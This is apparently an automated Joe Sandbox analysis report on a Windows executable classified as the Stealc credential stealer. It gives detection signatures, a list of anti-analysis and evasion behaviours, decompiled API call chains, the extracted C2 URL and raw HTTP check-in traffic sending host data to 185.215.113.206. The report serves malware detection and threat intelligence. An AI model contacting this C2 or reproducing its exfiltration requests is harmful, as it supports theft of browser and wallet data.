Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560591
MD5:7f133608117d2d14e36a7b73d6c173af
SHA1:b0d7ad4e7b66129b16512761d4a86303b5928a81
SHA256:3806b9f4eb73630796343fa069a80fc29705bd31f719ab9ad8841a17f225b8c4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7F133608117D2D14E36A7B73D6C173AF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 404JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 404JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-22T01:02:14.488656+010020442431Malware Command and Control Activity Detected192.168.2.649717185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/405117-2476756634-1003uAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpJAAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpoIHHAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php5IfHAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpfAAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/YIzHAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003E4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003E60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004040B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003F6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_003EEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003E9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003F6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003E9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003E7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003F18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003F4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003F23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003F2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003F2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003EDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003FCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003FDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003FD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003E16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003E16A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 32 33 37 38 39 35 39 38 31 36 32 32 33 35 37 33 34 35 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="hwid"2023789598162235734526------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build"mars------KFCBAEHCAEGDHJKFHJKF--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003E4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 32 33 37 38 39 35 39 38 31 36 32 32 33 35 37 33 34 35 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="hwid"2023789598162235734526------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build"mars------KFCBAEHCAEGDHJKFHJKF--
              Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206//
              Source: file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/405117-2476756634-1003u
              Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/I
              Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/YIzH
              Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/_
              Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php5IfH
              Source: file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJA
              Source: file.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfA
              Source: file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpoIHH
              Source: file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpt
